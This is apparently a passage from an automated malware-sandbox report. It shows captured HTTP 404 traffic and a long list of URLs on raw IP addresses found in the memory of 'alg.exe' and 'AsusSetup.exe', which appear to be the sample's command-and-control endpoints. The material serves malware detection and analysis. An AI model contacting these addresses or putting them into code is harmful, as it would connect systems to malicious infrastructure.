6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:51:48 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.14.0 (Ubuntu)Date: Mon, 28 Oct 2024 15:51:48 GMTContent-Type: text/htmlContent-Length: 580Connection: keep-aliveData Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 20 62 67 63 6f 6c 6f 72 3d 22 77 68 69 74 65 22 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 6e 67 69 6e 78 2f 31 2e 31 34 2e 30 20 28 55 62 75 6e 74 75 29 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a 3c 21 2d 2d 20 61 20 70 61 64 64 69 6e 67 20 74 6f 20 64 69 73 61 62 6c 65 20 4d 53 49 45 20 61 6e 64 20 43 68 72 6f 6d 65 20 66 72 69 65 6e 64 6c 79 20 65 72 72 6f 72 20 70 61 67 65 20 2d 2d 3e 0d 0a Data Ascii: <html><head><title>404 Not Found</title></head><body bgcolor="white"><center><h1>404 Not Found</h1></center><hr><center>nginx/1.14.0 (Ubuntu)</center></body></html><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page --><!-- a padding to disable MSIE and Chrome friendly error page -->
Source: alg.exe, 00000003.00000003.2725026412.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/
Source: alg.exe, 00000003.00000003.2725026412.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/b
Source: alg.exe, 00000003.00000003.2628578361.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/b8
Source: alg.exe, 00000003.00000003.2628578361.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/ubadvhdsrbjcmaql
Source: alg.exe, 00000003.00000003.2725026412.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/vo
Source: alg.exe, 00000003.00000003.2725026412.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150/vvo
Source: alg.exe, 00000003.00000003.2628578361.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2637723512.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/ubaevhdsrbjcmaqls
Source: alg.exe, 00000003.00000003.2725026412.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2734599445.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://13.251.16.150:80/vvo
Source: alg.exe, 00000003.00000003.2671636939.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/
Source: alg.exe, 00000003.00000003.2683846196.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2671636939.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/s
Source: alg.exe, 00000003.00000003.2671636939.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138/sd
Source: alg.exe, 00000003.00000003.2224451831.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2247222362.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/agsaomftijmP
Source: alg.exe, 00000003.00000003.2671636939.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/ckdrshko
Source: alg.exe, 00000003.00000003.2247222362.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/hogxps
Source: alg.exe, 00000003.00000003.2671636939.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://172.234.222.138:80/ofmvo
Source: alg.exe, 00000003.00000003.2882783390.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2893019936.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/
Source: AsusSetup.exe, 00000000.00000003.2202574488.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.00000000004F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/LF
Source: alg.exe, 00000003.00000003.2655317919.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/bs
Source: alg.exe, 00000003.00000003.2882783390.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ewf
Source: alg.exe, 00000003.00000003.2882783390.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ewfngsi
Source: alg.exe, 00000003.00000003.2655317919.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/kb
Source: alg.exe, 00000003.00000003.2882783390.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2893019936.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/ngs
Source: AsusSetup.exe, 00000000.00000003.2202574488.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.00000000004F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/w
Source: alg.exe, 00000003.00000003.2882783390.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107/wf
Source: alg.exe, 00000003.00000003.2882783390.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/ewf
Source: alg.exe, 00000003.00000003.2247222362.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/suoyjqbsciv-
Source: AsusSetup.exe, 00000000.00000002.2472059916.0000000000540000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.2202574488.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.141.10.107:80/wL
Source: alg.exe, 00000003.00000003.2850603674.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2693383096.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2903488909.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/
Source: alg.exe, 00000003.00000003.2693383096.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/(
Source: alg.exe, 00000003.00000003.2903488909.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/gs
Source: alg.exe, 00000003.00000003.2850603674.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/lre
Source: alg.exe, 00000003.00000003.2850603674.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2850603674.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/tlre
Source: alg.exe, 00000003.00000003.2850603674.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/tlremings
Source: alg.exe, 00000003.00000003.2903488909.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248/yqjotihouwfthlkr
Source: alg.exe, 00000003.00000003.2693383096.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/p
Source: alg.exe, 00000003.00000003.2850603674.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/tlre
Source: alg.exe, 00000003.00000003.2903488909.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.208.156.248:80/yqjotihouwfthlkr
Source: alg.exe, 00000003.00000003.2893019936.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/
Source: alg.exe, 00000003.00000003.2893019936.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/gs
Source: alg.exe, 00000003.00000003.2894777095.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2893019936.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120/vdqmhlkrsphqhe
Source: alg.exe, 00000003.00000003.2903488909.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2893019936.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://18.246.231.120:80/vdqmhlkrsphqhepjZ
Source: alg.exe, 00000003.00000003.2704536498.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/
Source: alg.exe, 00000003.00000003.2704536498.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/(
Source: alg.exe, 00000003.00000003.2799410403.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2813451839.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/arqypullvoovtlD
Source: alg.exe, 00000003.00000003.2792457959.00000000005F3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/dovasmbpdbys
Source: alg.exe, 00000003.00000003.2764371379.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745295044.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2703850793.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2756590445.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2765126800.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2733658174.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2778124270.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2789296981.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2724178578.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2790012087.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/hrtvnxyfpkjys
Source: alg.exe, 00000003.00000003.2764371379.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745295044.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2756590445.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2765126800.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2733658174.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2778124270.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2792457959.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2789296981.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2790012087.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/pubppqcmfqvto
Source: alg.exe, 00000003.00000003.2703850793.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2724178578.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245/pubppqcmfqvtod
Source: alg.exe, 00000003.00000003.2704536498.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/hrtvnxyfpkjy5
Source: alg.exe, 00000003.00000003.2704536498.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2725026412.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://208.100.26.245:80/pubppqcmfqvto
Source: alg.exe, 00000003.00000003.2823223980.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2841048769.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2894777095.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2865815201.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2852591845.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2813451839.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2882002918.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.211.97.45/qtybvvfgdyqy
Source: alg.exe, 00000003.00000003.2683846196.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/
Source: alg.exe, 00000003.00000003.2683846196.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/gs
Source: alg.exe, 00000003.00000003.2764371379.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745295044.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2703850793.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2756590445.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2765126800.00000000005F1000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2733658174.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2682947456.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2692633420.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2683846196.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2778124270.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2792457959.00000000005F3000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2789296981.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2724178578.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2790012087.00000000005F1000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160/qearwetpmwvhvwhi
Source: alg.exe, 00000003.00000003.2683846196.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://34.246.200.160:80/qearwetpmwvhvwhi
Source: alg.exe, 00000003.00000003.2755453879.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/
Source: alg.exe, 00000003.00000003.2755453879.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2755453879.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/oekfiuj
Source: alg.exe, 00000003.00000003.2755453879.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200/oekfiujings8
Source: alg.exe, 00000003.00000003.2755453879.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://35.164.78.200:80/oekfiuj
Source: AsusSetup.exe, 00000000.00000003.2202574488.0000000000508000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2734599445.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745895344.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2755453879.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2864295525.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/
Source: alg.exe, 00000003.00000003.2864295525.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/bs
Source: alg.exe, 00000003.00000003.2637723512.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/d
Source: alg.exe, 00000003.00000003.2864295525.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/j
Source: alg.exe, 00000003.00000003.2734599445.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/l
Source: AsusSetup.exe, 00000000.00000003.2202574488.0000000000518000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.0000000000518000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/ngs
Source: alg.exe, 00000003.00000003.2864295525.0000000000596000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2864295525.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/tj
Source: alg.exe, 00000003.00000003.2864295525.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/tjf
Source: AsusSetup.exe, 00000000.00000003.2203124475.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.2202574488.00000000004ED000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2476390228.0000000004D8E000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2472059916.00000000004F2000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/vicdeig
Source: AsusSetup.exe, 00000000.00000003.2203124475.0000000004D8D000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000002.2476390228.0000000004D8E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/vicdeigings
Source: alg.exe, 00000003.00000003.2224451831.000000000059B000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2216657614.000000000059A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/wurutvkart
Source: alg.exe, 00000003.00000003.2637723512.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105/yeb
Source: alg.exe, 00000003.00000003.2734599445.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/ql0
Source: alg.exe, 00000003.00000003.2864295525.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/tj7fZ
Source: AsusSetup.exe, 00000000.00000002.2472059916.0000000000540000.00000004.00000020.00020000.00000000.sdmp, AsusSetup.exe, 00000000.00000003.2202574488.0000000000540000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/vicdeigd
Source: alg.exe, 00000003.00000003.2224451831.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2247222362.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2216657614.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/wurutvkart
Source: alg.exe, 00000003.00000003.2704536498.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2725026412.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2671636939.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2655317919.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2693383096.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2683846196.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2637723512.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://44.221.84.105:80/yeb
Source: alg.exe, 00000003.00000003.2610742112.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/PbW
Source: alg.exe, 00000003.00000003.2610742112.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212/len
Source: alg.exe, 00000003.00000003.2610742112.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://47.129.31.212:80/lencrobat
Source: alg.exe, 00000003.00000003.2179509377.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/
Source: alg.exe, 00000003.00000003.2745895344.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/8
Source: alg.exe, 00000003.00000003.2823223980.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2841048769.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2894777095.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2865815201.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2852591845.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2908261913.00000000005EF000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2882002918.00000000005EF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/bdnjndwcxvdfjwtD
Source: AsusSetup.exe, 00000000.00000003.2170515807.000000000052B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/ea
Source: alg.exe, 00000003.00000003.2179509377.000000000057D000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2179863337.0000000000599000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2179107038.000000000059C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/juldvutdr
Source: alg.exe, 00000003.00000003.2745895344.0000000000596000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/swl
Source: alg.exe, 00000003.00000003.2179509377.000000000057D000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177/t
Source: alg.exe, 00000003.00000003.2224451831.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2207368852.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2216657614.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/fwyvvonbganP
Source: alg.exe, 00000003.00000003.2755453879.00000000005B9000.00000004.00000020.00020000.00000000.sdmp, alg.exe, 00000003.00000003.2745895344.00000000005B9000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://54.244.188.177:80/swls
